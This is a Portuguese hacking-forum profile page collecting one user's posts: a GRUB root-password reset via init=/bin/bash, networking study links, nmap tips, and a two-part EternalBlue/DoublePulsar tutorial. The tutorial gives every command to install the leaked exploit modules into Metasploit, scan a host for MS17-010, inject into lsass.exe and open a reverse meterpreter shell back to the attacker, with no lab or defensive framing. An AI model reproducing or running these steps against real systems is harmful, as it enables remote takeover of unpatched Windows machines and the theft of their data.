Ir para conteúdo

rapt00r

Membros
  • Total de itens

    10
  • Registrado em

  • Última visita

  • Dias Ganhos

    1

rapt00r ganhou o dia em 15 de junho

rapt00r teve o conteúdo mais curtido!

Reputação

7 Neutro

2 Seguidores

Últimos Visitantes

229 visualizações
  1. Salve Salve pessoal... Hoje eu venho trazer a vocês um tutorial de como recuperar senha do usuário root pelo grub Let's GO!!!! Primeiramente, você precisa iniciar o seu sistema e esperar abrir a tela do grub... Deixe o seu sistema selecionado, e aperte e para editar os comandos antes do boot. Agora você precisa encontrar a linha onde tem a imagem do seu Kernel e o UUID do seu HD. É parecido com isso... Onde tem rw quiet ou ro quiet, dependendo da distribuição, você deve substituir por ro init=/bin/bash (Usando as setas <- e -> para chegar até o texto, e substituindo pelo comando citado acima, ficando assim...) Depois de ter feito a alteração, você pressiona Ctrl+X para salvar as alterações e sair. Feito isso, ele vai iniciar o sistema com um uma shell temporária, como mostra a imagem abaixo... Até agora tudo deu certo :v, agora vamos montar nossa partição onde o sistema está instalado usando o seguinte comando... mount -o remount,rw / Esse comando, nos permite remontar a partição raiz ( / ) com permissões de leitura (r) e escrita (w) Deu certo !!!!! Agora vamos mudar a senha do usuário root com o comando passwd Escolha sua senha, e depois digite novamente, se tudo ocorrer bem, essa menssagem irá aparecer... Pronto Pessoal, agora é so dar um reboot ou exit. Em alguns casos, você precisa iniciar manualmente Agora é só entrar no sistema com a nova senha que você definiu pro root.... Por hoje é só galera, espero ter ajudado. Qualquer dúvida, é só falar aí em baixo!! Abraço, Valeuuuuu Fonte: http://www.nanoshots.com.br/2016/04/redefinindo-e-recuperando-senha-do.html
  2. Salve salve pessoal... Nessa postagem estarei deixando alguns sites que possuem conteúdo relacionado à Redes de Computadores... Segue os link aí pessoal 1º Portal GSTI LINK: https://www.portalgsti.com.br/2010/08/material-completo-de-redes-de-computadores.html -> Aqui você vai encontrar: 1.1. CURSO COMPLETO DE REDES (I, II) OFERECIDOS PELA CECIERJ 1.2. LIVROS (EBOOKS) DE REDES DE COMPUTADORES Material excepcional disponibilizado pela Escola Superior de Redes 1.3. SLIDES DE AULAS DE REDES DE COMPUTADORES DISPONIBILIZADO NA WEB PELA UFES(Universidade Federal do Espírito Santo) 1.4. SLIDES DE AULAS DE REDES DE COMPUTADORES II DISPONIBILIZADO PELA UFCG(Universidade Federal de Campina Grande) <3 1.5. SLIDES DE AULAS DE REDES DE COMPUTADORES III DISPONIBILIZADO PELO Professor Fabricio Breve 1.6. SLIDES DE AULAS DE REDES DE COMPUTADORES IV DISPONIBILIZADO PELO Professor Adriano Mauro Cansian 1.7. Vídeoaulas gratuitas Redes de Computadores ministradas pelos professores Cláudio de C. Monteiro, Alex Coelho, Evanderson Alex Almeida e Vinícius de M. Rios. 2º Canal Boson Treinamentos LINK: https://www.youtube.com/playlist?list=PLucm8g_ezqNpGh95n-OdEk06ity7YYfvU -> Aqui você encontra uma playlist com vários assuntos ligados à Redes de Computadores 3º Canal do Professor Kretcheu LINK: https://www.youtube.com/user/kretcheu2001/playlists -> Aqui você encontra os vídeos do canal do Professor Kretcheu que ensina muito bem Redes Bem Pessoal, por hoje é só... Espero que vocês possam estudar bastante Lembrem-se Redes é ESSENCIAL para todo profissional de TI, especialmente se você quer trabalhar na área de Segurança da Informação <3 Abraço!!!
  3. Opa, tudo blz?!! Rapaz eu acho o seguinte, começa pelo Kali mesmo pra estudar Segurança da Informação, não como sistema principal. Ao longo do tempo, quando você for pegando experiência e certo domínio no assunto, você pode escolher uma distribuição Linux "limpa" e ir montando o seu sistema, com ferramentas que vocẽ vai ter a certeza que vai usar. Quanto a performace do Kali, tenta utilizar o Kali com o ambiente xfce4 (é mais leve) e pode ser que o desempenho fique melhor Qualquer dúvida só falar Abraço!!!
  4. Show... Esperando pelo próximo. Esse Nível 4 ein...
  5. Cara, o parâmetro -sC vai executar uma verificação usando um conjunto padrão de Scripts... Acho que vai servir pra o que você está tentando fazer... Outra maneira é você todos os scripts divididos por categoria... Segue aí EX: Se você quer executar todos os scripts da categoria http Você deve utilizar o comando nmap --script "http-*" Se quiser executar todos os scripts da categoria smb Esse é o comando nmap --script "smb*" Espero que possa ter ajudado Qualquer dúvida pode chamar aí Abraço !!!
  6. Sim, mas primeiro você precisa ver se o host está vulnerável, e se você possui as portas abertas no seu router... Pode também fazer o redirecionamento de portas, para a conexão reversa voltar para seu ip local
  7. Sim. Quando você instala o wine, ele cria o diretório oculto na home do seu usuário, no meu caso. Meu usuario se chama vitor é só ir na pasta home do seu usuário e colocar o caminho /.wine/drive_c/ /home/vitor/.wine/drive_c/
  8. COE RAPAZIADA.... Salve salve glr, estou aqui novamente trazendo agora a 2ª parte do tutorial sobre o EternalBlue & DoublePulsar. Bom no tutorial anterior eu falei um poquinho sobre os dois exploits e como adicioná los ao metasploit juntamente com um módulo auxiliar pra nos ajudar a verificar se o nosso alvo está vulnerável. Link da Parte 1: [TUTORIAL] Eternalblue & Doublepulsar - 1ª Parte CHEGA DE CONVERSA E BORA LÁAAAA Primeiramente vamos verificar se o nosso alvo está vulnerável usando o modulo auxiliar... msf > use auxiliary/scanner/smb/smb_ms17_010 msf auxiliary(smb_ms17_010) > set RHOST ip_do_seu_alvo msf auxiliary(smb_ms17_010) > run Se você receber uma resposta dessa forma, o host está vulnerável Bom, sabendo que o host está vulnerável vamos à exploração... \o/ Vamos selecionar o exploit e definir suas opções. Segue aí msf > use exploit/windows/smb/eternalblue_doublepulsar msf exploit(eternalblue_doublepulsar) > options .: DOUBLEPULSARPATH e ETERNALBLUEPATH :. Primeiro vamos definir o local onde está a pasta deps do exploit para as opções No meu caso está em /opt/metasploit/modules/exploits/windows/smb/deps/ msf exploit(eternalblue_doublepulsar) > set DOUBLEPULSARPATH /opt/metasploit/modules/exploits/windows/smb/deps/ msf exploit(eternalblue_doublepulsar) > set ETERNALBLUEPATH /opt/metasploit/modules/exploits/windows/smb/deps/ .: PROCESSINJECT :. Se seu alvo for x86 use wlms.exe, se for x64 use lsass.exe Como o nosso alvo é 64 bits, usaremos a 2 opção msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT lsass.exe .: RHOST :. Aqui vamos colocar o ip do alvo msf exploit(eternalblue_doublepulsar) > set RHOST ip_do_alvo .: TARGETARCHITECTURE :. Aqui você irá colocar a arquitetura do sistema alvo... (x86 ou x64) No meu caso o sistema é x64. msf exploit(eternalblue_doublepulsar) > set TARGETARCHITECTURE x64 .: WINEPATH :. Agora vamos colocar o local onde o wine está instalado seguido do drive onde a DLL será gerada, o /drive_c/ No meu caso ele está instalado na home do meu user... msf exploit(eternalblue_doublepulsar) > set WINEPATH /home/vitor/.wine/drive_c/ .: TARGET :. Falta agora apenas definirmos o sistema alvo, para ver os sistemas disponíveis utilize o comando show targets Depois de escolher o target correto, vamos setar o id. Estou usando o windows 7 como alvo msf exploit(eternalblue_doublepulsar) > set target 9 ou msf exploit(eternalblue_doublepulsar) > set target 0 PRONTO!!! NOSSO EXPLOIT JÁ ESTÁ PRONTO PARA SER USADO. MAS.... FALTA O NOSSO PAYLOAD .: PAYLOAD :. Irei usar o meterpreter na versão x64, mas fica a seu critério de qual payload usar msf exploit(eternalblue_doublepulsar) > set payload windows/x64/meterpreter/reverse_tcp .: LHOST :. Vamos agora configurar o host que receberá a conexão reversa... msf exploit(eternalblue_doublepulsar) > set LHOST seu_ip TUDO PRONTO!!! AGORA É SÓ EXPLOITAR E VER SE TUDO OCORREU BEM \o/ msf exploit(eternalblue_doublepulsar) > exploit Bom galera, se tudo ocorrer bem uma sessão no meterpreter será aberta, como mostra a imagem abaixo Em breve, postarei um vídeo sobre tudo isso que foi dito acima Por hoje é só galera !!! Qualquer dúvida, crítica, sugestão só comentar aí pessoal Abraço !!!! ________________________________________________________________________________________________________
  9. Rapaz, tenta o seguinte... Cria o caminho do exploit dentro da pasta .msf4 que fica na sua home... mkdir -p ~/.msf4/modules/exploits/windows/smb/ Agora move a pasta deps e o exploit pra dentro do caminho que você criou, ficando assim... mv deps eternalblue_doublepulsar.rb ~/.msf4/modules/exploits/windows/smb Depois disso abre seu Metasploit e recarrega tudo com o seguinte comando... reload_all Acho que vai funcionar ... Abraço !!!
  10. Opa pessoal, é meu primeiro tópico aqui no forum, então desculpa qualquer coisa Galera, esse tutorial vai ser dividido em 2 partes, essa primeira parte é onde você vai adicionar tudo que é preciso pra explorar a falha... Recentemente, algumas ferramentas da NSA foram vazada por um grupo de hackers denominados The Shadow Brokers, entre elas estão dois exploits voltado para sistemas Windows, o primeiro denominado Eternalbue e o segundo DoublePulsar . O Eternalblue explora uma vulnerabilidade de execução remota de código nos protocolos SMBv1 e NBT sobre as portas TCP 445 e 139 respectivamente. Já o DoublePulsar é usado para injetar arquivos DLL's juntamente com um payload. Até agora as versões que são afetadas pelo exploit... 1 Windows XP (all services pack) (x86) (x64) 2 Windows Server 2003 SP0 (x86) 3 Windows Server 2003 SP1/SP2 (x86) 4 Windows Server 2003 (x64) 5 Windows Vista (x86) 6 Windows Vista (x64) 7 Windows Server 2008 (x86) 8 Windows Server 2008 R2 (x86) (x64) 9 Windows 7 (all services pack) (x86) (x64) Bom, hoje venho trazer pra vocês um tutorial pra adicionar os exploits ao Metasploit... Então vamos lá.... .: Requisitos :. Metasploit Wget Git .: Adicionando os exploits no Metasploit :. 1. Primeiramente vamos ter que adicionar os 2 exploits ao Metasploit e um módulo auxiliar, é rápido e facil... Segue aí 1.1 Vamos baixar primeiramente o módulo auxiliar que vai nos ajudar a verificar se o nosso alvo é vulnerável ao MS17-010 e adicioná-lo ao nosso Metasploit. wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb 1.2 Depois de baixado o arquivo, você deverá movê-lo para a pasta /modules/auxiliary/scanner/smb/ no caminho de instalação do seu metasploit... No meu sistema ele se encontra em /opt/metasploit/, no meu caso vai ficar dessa forma... # mv smb_ms17-010.rb /opt/metasploit/modules/auxiliary/scanner/smb/ 1.3 Agora vamos baixar os exploits \o/!!!! git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git 1.4 Depois de baixado o repositório, vamos colocar os arquivos dos exploits no nosso querido metasploit . Para adicionar é o mesmo processo anterior, só que vamos mudar apenas o caminho que será agora /modules/exploits/windows/smb/ OBS: Vamos copiar apenas o eternalblue_doublepulsar.rb e a pasta deps # cd Eternalblue-Doublepulsar-Metasploit # mv deps eternalblue_doublepulsar.rb /opt/metasploit/modules/exploits/windows/smb/ Finish!!! Já está tudo pronto para a próxima fase UHUUUUUUUUU \o/ Por Hoje é só galera, no próximo post irei ensinar a vocês a explorar a falha... Abraço !!!!
×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.